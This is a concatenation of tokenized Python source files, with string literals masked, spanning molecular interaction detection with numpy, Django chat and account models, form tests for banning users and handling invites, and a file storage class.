. format ( <EOL> self . _expected_name <EOL> ) <EOL> @ matcher <EOL> class ContentMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , content , find = False ) : <EOL> self . _expected = content <EOL> self . _find = find <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _actual = response . data <EOL> if self . _find : <EOL> return self . _actual . find ( self . _expected ) != - <NUM_LIT:1> <EOL> else : <EOL> return self . _actual == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> if self . _find : <EOL> if self . _multiline : <EOL> message = "<STR_LIT>" <EOL> else : <EOL> message = "<STR_LIT>" <EOL> else : <EOL> if self . _multiline : <EOL> message = "<STR_LIT>" <EOL> else : <EOL> message = "<STR_LIT>" <EOL> return message . format ( self . _expected , self . _actual ) <EOL> def message_for_failed_should_not ( self ) : <EOL> if self . _find : <EOL> if self . _multiline : <EOL> message = "<STR_LIT>" + "<STR_LIT>" <EOL> else : <EOL> message = "<STR_LIT>" <EOL> return message . format ( self . _expected , self . _actual ) <EOL> else : <EOL> if self . _multiline : <EOL> message = "<STR_LIT>" <EOL> else : <EOL> message = "<STR_LIT>" <EOL> return message . format ( self . _expected ) <EOL> @ property <EOL> def _multiline ( self ) : <EOL> '''<STR_LIT>''' <EOL> for string in [ self . _expected , self . _actual ] : <EOL> if len ( string ) > <NUM_LIT> or string . find ( '<STR_LIT:\n>' ) != - <NUM_LIT:1> : <EOL> return True <EOL> return False </s>
<s> from google . appengine . ext import db <EOL> from PerformanceEngine import pdb <EOL> class PdbModel ( pdb . Model ) : <EOL> name = db . StringProperty ( ) <EOL> count = db . IntegerProperty ( ) <EOL> class TestModel ( db . Model ) : <EOL> name = db . StringProperty ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from oddt . spatial import dihedral , angle , angle_2v , distance <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def close_contacts ( x , y , cutoff , x_column = '<STR_LIT>' , y_column = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if len ( x [ x_column ] ) > <NUM_LIT:0> and len ( x [ x_column ] ) > <NUM_LIT:0> : <EOL> d = distance ( x [ x_column ] , y [ y_column ] ) <EOL> index = np . argwhere ( ( d > <NUM_LIT:0> ) & ( d <= cutoff ) ) <EOL> return x [ index [ : , <NUM_LIT:0> ] ] , y [ index [ : , <NUM_LIT:1> ] ] <EOL> else : <EOL> return x [ [ ] ] , y [ [ ] ] <EOL> def hbond_acceptor_donor ( mol1 , mol2 , cutoff = <NUM_LIT> , base_angle = <NUM_LIT> , tolerance = <NUM_LIT:30> ) : <EOL> """<STR_LIT>""" <EOL> a , d = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> if len ( a ) > <NUM_LIT:0> and len ( d ) > <NUM_LIT:0> : <EOL> angle1 = angle ( d [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] ) <EOL> angle2 = angle ( a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , d [ '<STR_LIT>' ] [ : , np . newaxis , : ] , d [ '<STR_LIT>' ] ) <EOL> a_neighbors_num = np . sum ( ~ np . isnan ( a [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> d_neighbors_num = np . sum ( ~ np . isnan ( d [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> strict = ( ( ( angle1 > ( base_angle / a_neighbors_num - tolerance ) ) | np . isnan ( angle1 ) ) & ( ( angle2 > ( base_angle / d_neighbors_num - tolerance ) ) | np . isnan ( angle2 ) ) ) . all ( axis = - <NUM_LIT:1> ) <EOL> return a , d , strict <EOL> else : <EOL> return a , d , np . array ( [ ] , dtype = bool ) <EOL> def hbond ( mol1 , mol2 , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> a1 , d1 , s1 = hbond_acceptor_donor ( mol1 , mol2 , * args , ** kwargs ) <EOL> a2 , d2 , s2 = hbond_acceptor_donor ( mol2 , mol1 , * args , ** kwargs ) <EOL> return np . concatenate ( ( a1 , d2 ) ) , np . concatenate ( ( d1 , a2 ) ) , np . concatenate ( ( s1 , s2 ) ) <EOL> def halogenbond_acceptor_halogen ( mol1 , mol2 , base_angle_acceptor = <NUM_LIT> , base_angle_halogen = <NUM_LIT> , tolerance = <NUM_LIT:30> , cutoff = <NUM_LIT:4> ) : <EOL> """<STR_LIT>""" <EOL> a , h = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> if len ( a ) > <NUM_LIT:0> and len ( h ) > <NUM_LIT:0> : <EOL> angle1 = angle ( h [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] ) <EOL> angle2 = angle ( a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , h [ '<STR_LIT>' ] [ : , np . newaxis , : ] , h [ '<STR_LIT>' ] ) <EOL> a_neighbors_num = np . sum ( ~ np . isnan ( a [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> h_neighbors_num = np . sum ( ~ np . isnan ( h [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> strict = ( ( ( angle1 > ( base_angle_acceptor / a_neighbors_num - tolerance ) ) | np . isnan ( angle1 ) ) & ( ( angle2 > ( base_angle_halogen / h_neighbors_num - tolerance ) ) | np . isnan ( angle2 ) ) ) . all ( axis = - <NUM_LIT:1> ) <EOL> return a , h , strict <EOL> else : <EOL> return a , h , np . array ( [ ] , dtype = bool ) <EOL> def halogenbond ( mol1 , mol2 , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> a1 , h1 , s1 = halogenbond_acceptor_halogen ( mol1 , mol2 , ** kwargs ) <EOL> a2 , h2 , s2 = halogenbond_acceptor_halogen ( mol2 , mol1 , ** kwargs ) <EOL> return np . concatenate ( ( a1 , h2 ) ) , np . concatenate ( ( h1 , a2 ) ) , np . concatenate ( ( s1 , s2 ) ) <EOL> def pi_stacking ( mol1 , mol2 , cutoff = <NUM_LIT:5> , tolerance = <NUM_LIT:30> ) : <EOL> """<STR_LIT>""" <EOL> r1 , r2 = close_contacts ( mol1 . ring_dict , mol2 . ring_dict , cutoff , x_column = '<STR_LIT>' , y_column = '<STR_LIT>' ) <EOL> if len ( r1 ) > <NUM_LIT:0> and len ( r2 ) > <NUM_LIT:0> : <EOL> angle1 = angle_2v ( r1 [ '<STR_LIT>' ] , r2 [ '<STR_LIT>' ] ) <EOL> angle2 = angle ( r1 [ '<STR_LIT>' ] + r1 [ '<STR_LIT>' ] , r1 [ '<STR_LIT>' ] , r2 [ '<STR_LIT>' ] ) <EOL> strict_parallel = ( ( angle1 > <NUM_LIT> - tolerance ) | ( angle1 < tolerance ) ) & ( ( angle2 > <NUM_LIT> - tolerance ) | ( angle2 < tolerance ) ) <EOL> strict_perpendicular = ( ( angle1 > <NUM_LIT> - tolerance ) & ( angle1 < <NUM_LIT> + tolerance ) ) & ( ( angle2 > <NUM_LIT> - tolerance ) | ( angle2 < tolerance ) ) <EOL> return r1 , r2 , strict_parallel , strict_perpendicular <EOL> else : <EOL> return r1 , r2 , np . array ( [ ] , dtype = bool ) , np . array ( [ ] , dtype = bool ) <EOL> def salt_bridge_plus_minus ( mol1 , mol2 , cutoff = <NUM_LIT:4> ) : <EOL> """<STR_LIT>""" <EOL> m1_plus , m2_minus = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> return m1_plus , m2_minus <EOL> def salt_bridges ( mol1 , mol2 , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> m1_plus , m2_minus = salt_bridge_plus_minus ( mol1 , mol2 , * args , ** kwargs ) <EOL> m2_plus , m1_minus = salt_bridge_plus_minus ( mol2 , mol1 , * args , ** kwargs ) <EOL> return np . concatenate ( ( m1_plus , m1_minus ) ) , np . concatenate ( ( m2_minus , m2_plus ) ) <EOL> def hydrophobic_contacts ( mol1 , mol2 , cutoff = <NUM_LIT:4> ) : <EOL> """<STR_LIT>""" <EOL> h1 , h2 = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> return h1 , h2 <EOL> def pi_cation ( mol1 , mol2 , cutoff = <NUM_LIT:5> , tolerance = <NUM_LIT:30> ) : <EOL> """<STR_LIT>""" <EOL> r1 , plus2 = close_contacts ( mol1 . ring_dict , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff , x_column = '<STR_LIT>' ) <EOL> if len ( r1 ) > <NUM_LIT:0> and len ( plus2 ) > <NUM_LIT:0> : <EOL> angle1 = angle_2v ( r1 [ '<STR_LIT>' ] , plus2 [ '<STR_LIT>' ] - r1 [ '<STR_LIT>' ] ) <EOL> strict = ( angle1 > <NUM_LIT> - tolerance ) | ( angle1 < tolerance ) <EOL> return r1 , plus2 , strict <EOL> else : <EOL> return r1 , plus2 , np . array ( [ ] , dtype = bool ) <EOL> def acceptor_metal ( mol1 , mol2 , base_angle = <NUM_LIT> , tolerance = <NUM_LIT:30> , cutoff = <NUM_LIT:4> ) : <EOL> """<STR_LIT>""" <EOL> a , m = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> if len ( a ) > <NUM_LIT:0> and len ( m ) > <NUM_LIT:0> : <EOL> angle1 = angle ( m [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] ) <EOL> a_neighbors_num = np . sum ( ~ np . isnan ( a [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> strict = ( ( angle1 > ( base_angle / a_neighbors_num - tolerance ) ) | np . isnan ( angle1 ) ) . all ( axis = - <NUM_LIT:1> ) <EOL> return a , m , strict <EOL> else : <EOL> return a , m , np . array ( [ ] , dtype = bool ) <EOL> def pi_metal ( mol1 , mol2 , cutoff = <NUM_LIT:5> , tolerance = <NUM_LIT:30> ) : <EOL> """<STR_LIT>""" <EOL> r1 , m = close_contacts ( mol1 . ring_dict , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff , x_column = '<STR_LIT>' ) <EOL> if len ( r1 ) > <NUM_LIT:0> and len ( m ) > <NUM_LIT:0> : <EOL> angle1 = angle_2v ( r1 [ '<STR_LIT>' ] , m [ '<STR_LIT>' ] - r1 [ '<STR_LIT>' ] ) <EOL> strict = ( angle1 > <NUM_LIT> - tolerance ) | ( angle1 < tolerance ) <EOL> return r1 , m , strict <EOL> else : <EOL> return r1 , m , np . array ( [ ] , dtype = bool ) </s>
<s> from django . db import models <EOL> import chatServerConstants <EOL> class Receipient ( models . Model ) : <EOL> name = models . CharField ( max_length = chatServerConstants . MAX_NAME_LENGTH ) <EOL> alias = models . CharField ( max_length = chatServerConstants . MAX_ALIAS_LENGTH , blank = True ) <EOL> dateCreated = models . DateTimeField ( auto_now_add = True ) <EOL> lastEditTime = models . DateTimeField ( auto_now = True ) <EOL> token = models . CharField ( max_length = chatServerConstants . MAX_TOKEN_LENGTH ) <EOL> photoUri = models . CharField ( max_length = chatServerConstants . MAX_PROFILE_URI_LENGTH , blank = True ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . alias ) <EOL> class Message ( models . Model ) : <EOL> sender = models . ForeignKey ( Receipient , related_name = '<STR_LIT>' ) <EOL> receipient = models . ForeignKey ( Receipient , related_name = '<STR_LIT>' ) <EOL> parentMessage = models . ForeignKey ( '<STR_LIT>' , blank = True , null = True ) <EOL> body = models . CharField ( max_length = chatServerConstants . MAX_BODY_LENGTH , blank = True ) <EOL> subject = models . CharField ( max_length = chatServerConstants . MAX_SUBJECT_LENGTH , blank = True ) <EOL> dateCreated = models . DateTimeField ( auto_now_add = True ) <EOL> lastEditTime = models . DateTimeField ( auto_now = True ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . subject ) <EOL> class MessageMarker ( models . Model ) : <EOL> receipient = models . ForeignKey ( Receipient ) <EOL> associatedMessage = models . ForeignKey ( Message ) <EOL> dateCreated = models . DateTimeField ( auto_now_add = True ) <EOL> lastEditTime = models . DateTimeField ( auto_now = True ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . receipient , self . associatedMessage ) </s>
<s> from django import forms <EOL> class DocumentForm ( forms . Form ) : <EOL> blob = forms . FileField ( label = '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import environ <EOL> env = environ . Env ( <EOL> BRAND_TITLE = ( str , '<STR_LIT>' ) , <EOL> ORGANIZATION = ( str , '<STR_LIT>' ) , <EOL> HOSTNAME = ( str , '<STR_LIT>' ) , <EOL> ORIGIN = ( str , '<STR_LIT>' ) , <EOL> DEFAULT_FROM_ADDRESS = ( str , '<STR_LIT>' ) , <EOL> DEFAULT_FROM_EMAIL = ( str , '<STR_LIT>' ) , <EOL> SYSTEM_USER_NAME = ( str , '<STR_LIT>' ) , <EOL> SYSTEM_USER_EMAIL = ( str , '<STR_LIT>' ) , <EOL> GOOGLE_ANALYTICS_PROPERTY_ID = ( str , '<STR_LIT>' ) , <EOL> GOOGLE_ANALYTICS_DEBUG_MODE = ( bool , False ) , <EOL> ICON_PREFIX = ( str , "<STR_LIT>" ) <EOL> ) <EOL> BRAND_TITLE = env ( '<STR_LIT>' ) <EOL> ORGANIZATION = env ( '<STR_LIT>' ) <EOL> HOSTNAME = env ( '<STR_LIT>' ) <EOL> ORIGIN = env ( '<STR_LIT>' ) <EOL> DEFAULT_FROM_EMAIL = env ( '<STR_LIT>' ) <EOL> DEFAULT_FROM_ADDRESS = env ( '<STR_LIT>' ) <EOL> SYSTEM_USER_EMAIL = env ( '<STR_LIT>' ) <EOL> SYSTEM_USER_NAME = env ( '<STR_LIT>' ) <EOL> GA_PROPERTYID = env ( '<STR_LIT>' ) <EOL> GA_DEBUG_MODE = env ( '<STR_LIT>' ) <EOL> EMAIL_SECRET_KEY = env ( '<STR_LIT>' ) <EOL> ICON_PREFIX = env ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import timedelta , datetime <EOL> from django . contrib . auth import get_user_model <EOL> from django . core . exceptions import ValidationError <EOL> from django . test import TestCase <EOL> from django . test . utils import override_settings <EOL> from django . utils . timezone import now <EOL> from mock import patch <EOL> from model_mommy import mommy <EOL> from open_connect . accounts import forms <EOL> from open_connect . accounts . models import Invite <EOL> from open_connect . connectmessages . models import Thread <EOL> from open_connect . connectmessages . tests import ConnectMessageTestCase <EOL> from open_connect . connect_core . tests . test_utils_mixins import TEST_HTML <EOL> User = get_user_model ( ) <EOL> class UserFormTest ( ConnectMessageTestCase ) : <EOL> """<STR_LIT>""" <EOL> @ patch . object ( forms . SanitizeHTMLMixin , '<STR_LIT>' ) <EOL> def test_form_cleans_html ( self , mock ) : <EOL> """<STR_LIT>""" <EOL> form = forms . UserForm ( { '<STR_LIT>' : TEST_HTML } , instance = self . user1 ) <EOL> form . is_valid ( ) <EOL> mock . assert_called_once_with ( TEST_HTML ) <EOL> class UserAdminFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_init ( self ) : <EOL> """<STR_LIT>""" <EOL> class BanUserFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( BanUserFormTest , self ) . setUp ( ) <EOL> self . group1 = mommy . make ( '<STR_LIT>' ) <EOL> self . normal_user = mommy . make ( '<STR_LIT>' ) <EOL> self . normal_user . add_to_group ( self . group1 . pk ) <EOL> self . banned_user = mommy . make ( '<STR_LIT>' ) <EOL> self . banned_user . add_to_group ( self . group1 . pk ) <EOL> thread = mommy . make ( '<STR_LIT>' , group = self . group1 ) <EOL> self . message1 = mommy . make ( <EOL> '<STR_LIT>' , sender = self . banned_user , thread = thread ) <EOL> self . message1 . created_at = now ( ) - timedelta ( hours = <NUM_LIT:3> ) <EOL> self . message1 . save ( ) <EOL> self . message2 = mommy . make ( <EOL> '<STR_LIT>' , sender = self . normal_user , thread = thread ) <EOL> self . thread = Thread . objects . get ( pk = thread . pk ) <EOL> def test_save_first_message_sender_is_banned_user ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . thread . first_message , self . message1 ) <EOL> self . assertEqual ( self . thread . latest_message , self . message2 ) <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : True } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> thread = Thread . objects . get ( pk = self . thread . pk ) <EOL> self . assertEqual ( thread . latest_message , self . message2 ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertTrue ( user . is_banned ) <EOL> def test_save_latest_message_sender_is_banned_user ( self ) : <EOL> """<STR_LIT>""" <EOL> self . message1 . sender = self . normal_user <EOL> self . message1 . save ( ) <EOL> self . message2 . sender = self . normal_user <EOL> self . message2 . created_at = now ( ) + timedelta ( seconds = <NUM_LIT:10> ) <EOL> self . message2 . save ( ) <EOL> mommy . make ( <EOL> '<STR_LIT>' , <EOL> thread = self . thread , <EOL> sender = self . banned_user <EOL> ) <EOL> message4 = mommy . make ( <EOL> '<STR_LIT>' , <EOL> thread = self . thread , <EOL> sender = self . banned_user <EOL> ) <EOL> thread = Thread . objects . get ( pk = self . thread . pk ) <EOL> self . assertEqual ( thread . first_message , self . message1 ) <EOL> self . assertEqual ( thread . latest_message , message4 ) <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( <EOL> { <EOL> '<STR_LIT:user>' : self . banned_user . pk , <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertTrue ( user . is_banned ) <EOL> thread = Thread . objects . get ( pk = self . thread . pk ) <EOL> self . assertEqual ( thread . latest_message , self . message2 ) <EOL> def test_save_confirm_is_true_user_gets_banned ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( <EOL> { <EOL> '<STR_LIT:user>' : self . banned_user . pk , <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertTrue ( user . is_banned ) <EOL> def test_save_confirm_is_false_user_does_not_get_banned ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : False } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertFalse ( user . is_banned ) <EOL> @ patch . object ( forms , '<STR_LIT>' ) <EOL> def test_save_confirm_is_false_threads_not_updated ( self , mock_thread ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : False } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> self . assertEqual ( mock_thread . objects . filter . call_count , <NUM_LIT:0> ) <EOL> form = forms . BanUserForm ( <EOL> { <EOL> '<STR_LIT:user>' : self . banned_user . pk , <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> self . assertEqual ( mock_thread . objects . filter . call_count , <NUM_LIT:1> ) <EOL> class UnBanUserFormTest ( ConnectMessageTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( UnBanUserFormTest , self ) . setUp ( ) <EOL> self . banned_user = mommy . make ( '<STR_LIT>' , is_banned = True ) <EOL> self . banned_user . add_to_group ( self . group1 . pk ) <EOL> @ patch . object ( forms , '<STR_LIT>' ) <EOL> def test_save_confirm_is_false_thread_not_updated ( self , mock_thread ) : <EOL> """<STR_LIT>""" <EOL> form = forms . UnBanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : False } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> self . assertEqual ( mock_thread . objects . filter . call_count , <NUM_LIT:0> ) <EOL> form = forms . UnBanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : True } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> self . assertEqual ( mock_thread . objects . filter . call_count , <NUM_LIT:1> ) <EOL> def test_save_confirm_is_false_user_not_unbanned ( self ) : <EOL> """<STR_LIT>""" <EOL> self . banned_user . is_banned = True <EOL> self . banned_user . save ( ) <EOL> form = forms . UnBanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : True } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertFalse ( user . is_banned ) <EOL> def test_save_unbanned_user_sent_most_recent_message ( self ) : <EOL> """<STR_LIT>""" <EOL> thread = mommy . make ( '<STR_LIT>' , group = self . group1 ) <EOL> message1 = mommy . make ( <EOL> '<STR_LIT>' , sender = self . normal_user , thread = thread ) <EOL> message2 = mommy . make ( <EOL> '<STR_LIT>' , sender = self . banned_user , thread = thread ) <EOL> message2 . created_at = now ( ) + timedelta ( seconds = <NUM_LIT:10> ) <EOL> message2 . save ( ) <EOL> thread = Thread . objects . get ( pk = thread . pk ) <EOL> self . assertEqual ( thread . latest_message , message1 ) <EOL> form = forms . UnBanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : True } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> thread = Thread . objects . get ( pk = thread . pk ) <EOL> self . assertEqual ( thread . latest_message , message2 ) <EOL> class InviteFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_clean_emails_one_email ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . InviteForm ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> self . assertEqual ( form . clean_emails ( ) , [ '<STR_LIT>' ] ) <EOL> def test_clean_emails_multiple_addresses ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . InviteForm ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> emails = form . clean_emails ( ) <EOL> self . assertItemsEqual ( <EOL> emails , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_clean_emails_no_valid_addresses ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ValidationError ) : <EOL> form = forms . InviteForm ( { '<STR_LIT>' : '<STR_LIT:test>' } ) <EOL> self . assertFalse ( form . is_valid ( ) ) <EOL> form . clean_emails ( ) <EOL> @ override_settings ( CELERY_ALWAYS_EAGER = False ) <EOL> def test_save ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . InviteForm ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> form . created_by = mommy . make ( '<STR_LIT>' , is_superuser = True ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> result = form . save ( ) <EOL> self . assertEqual ( len ( result ) , <NUM_LIT:3> ) <EOL> first_result = Invite . objects . get ( pk = result [ <NUM_LIT:0> ] . pk ) <EOL> self . assertIsNone ( first_result . notified ) <EOL> class InviteEntryFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_clean_invite_code ( self ) : <EOL> """<STR_LIT>""" <EOL> invite = mommy . make ( '<STR_LIT>' ) <EOL> form = forms . InviteEntryForm ( { '<STR_LIT>' : invite . code } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> self . assertEqual ( form . cleaned_data [ '<STR_LIT>' ] , invite ) <EOL> def test_clean_invite_code_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . InviteEntryForm ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertFalse ( form . is_valid ( ) ) <EOL> def test_save ( self ) : <EOL> """<STR_LIT>""" <EOL> invite = mommy . make ( '<STR_LIT>' ) <EOL> self . assertFalse ( invite . consumed_at ) <EOL> self . assertFalse ( invite . consumed_by ) <EOL> form = forms . InviteEntryForm ( { '<STR_LIT>' : invite . code } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> user = mommy . make ( '<STR_LIT>' ) <EOL> form . user_id = user . pk <EOL> form . save ( ) <EOL> invite = Invite . objects . get ( pk = invite . pk ) <EOL> self . assertTrue ( invite . consumed_at ) <EOL> self . assertEqual ( invite . consumed_by , user ) <EOL> class TermsAndConductAcceptFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_valid ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . TermsAndConductAcceptForm ( <EOL> { '<STR_LIT>' : True , '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:/>' } <EOL> ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> def test_save ( self ) : <EOL> """<STR_LIT>""" <EOL> user = mommy . make ( '<STR_LIT>' ) <EOL> form = forms . TermsAndConductAcceptForm ( <EOL> { '<STR_LIT>' : '<STR_LIT:yes>' , '<STR_LIT>' : '<STR_LIT:yes>' , '<STR_LIT>' : '<STR_LIT:/>' } <EOL> ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> user = form . save ( user . pk ) <EOL> self . assertIsInstance ( user . tos_accepted_at , datetime ) <EOL> self . assertIsInstance ( user . ucoc_accepted_at , datetime ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from uuid import uuid4 <EOL> from django . conf import settings <EOL> from django . core . files . storage import get_storage_class <EOL> AttachmentStorageEngine = get_storage_class ( <EOL> import_path = getattr ( <EOL> settings , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> ) <EOL> def uniqify_filename ( filename ) : <EOL> """<STR_LIT>""" <EOL> filelist = filename . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> filelist [ <NUM_LIT:0> ] = uuid4 ( ) . hex <EOL> return '<STR_LIT:.>' . join ( filelist ) <EOL> def setting ( name , default = None ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( settings , name , default ) <EOL> class HighValueStorage ( AttachmentStorageEngine ) : <EOL> """<STR_LIT>""" <EOL> default_acl = '<STR_LIT>' <EOL> secure_urls = True <EOL> custom_domain = None <EOL> querystring_expire = <NUM_LIT> <EOL> querystring_auth = True <EOL> class AttachmentStorage ( HighValueStorage ) : <EOL> """<STR_LIT>""" <EOL> def get_available_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> filename_format = '<STR_LIT>' <EOL> try : <EOL> clean_name = self . _clean_name ( name ) <EOL> except AttributeError : <EOL> clean_name = name <EOL> date = datetime . now ( ) . strftime ( '<STR_LIT>' ) <EOL> splitname = clean_name . rsplit ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> final_name = filename_format . format ( <EOL> path = splitname [ <NUM_LIT:0> ] , <EOL> date = date , <EOL> filename = uniqify_filename ( splitname [ <NUM_LIT:1> ] ) <EOL> ) <EOL> return final_name </s>
<s> """<STR_LIT>""" <EOL> from django . contrib import admin <EOL> from open_connect . groups . models import Category <EOL> class CategoryAdmin ( admin . ModelAdmin ) : <EOL> """<STR_LIT>""" <EOL> readonly_fields = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> admin . site . register ( Category , CategoryAdmin ) </s>
<s> """<STR_LIT>""" </s>
